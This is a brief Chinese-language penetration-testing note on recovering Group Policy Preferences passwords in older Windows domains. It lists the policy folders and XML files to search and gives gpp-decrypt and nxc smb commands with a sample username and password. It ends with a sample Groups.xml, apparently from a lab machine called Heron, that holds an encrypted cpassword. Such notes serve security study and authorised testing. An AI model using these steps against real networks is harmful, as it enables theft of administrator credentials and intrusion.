GPP Password
在较旧的 Windows 域环境下,GPP 允许管理员批量设置本地用户密码,而这些密码使用的是公开的 AES 密钥加密的。
Windows Local Privilege Escalation - HackTricks
Deep Dive into Kerberoasting Attack
1. 利用
获取
#搜索一下目录
C:\ProgramData\Microsoft\Group Policy\history
C:\Documents
Settings\All Users\Application Data\Microsoft\Group Policy\history #before Windows Vista
#通常位于以下文件内
Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml
解密 cPassword gpp-decrypt 可能解密不准确 (例子:Heron > 1.6. GPP Password)
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw #用gpp-decrypt
nxc smb 172.16.10.100 -u samuel.davies -p l6fkiy9oN -M gpp_password #用nxc模块
示例
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2024-06-04 15:59:45" uid="{535B586D-9541-4420-8E32-224F589E4F3A}"><Properties action="U" newName="" description="" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="HERON\svc-web-accounting" action="ADD" sid="S-1-5-21-1568358163-2901064146-3316491674-24602"/><Member name="HERON\svc-web-accounting-d" action="ADD" sid="S-1-5-21-1568358163-2901064146-3316491674-26101"/></Members></Properties></Group>
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2024-06-04 16:00:13" uid="{F3B0115E-D062-46CC-B10C-C3EB743C824A}"><Properties action="U" newName="_local" fullName="" description="local administrator" cpassword="1G19pP9gbIPUr5xLeKhEUg==" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
</Groups>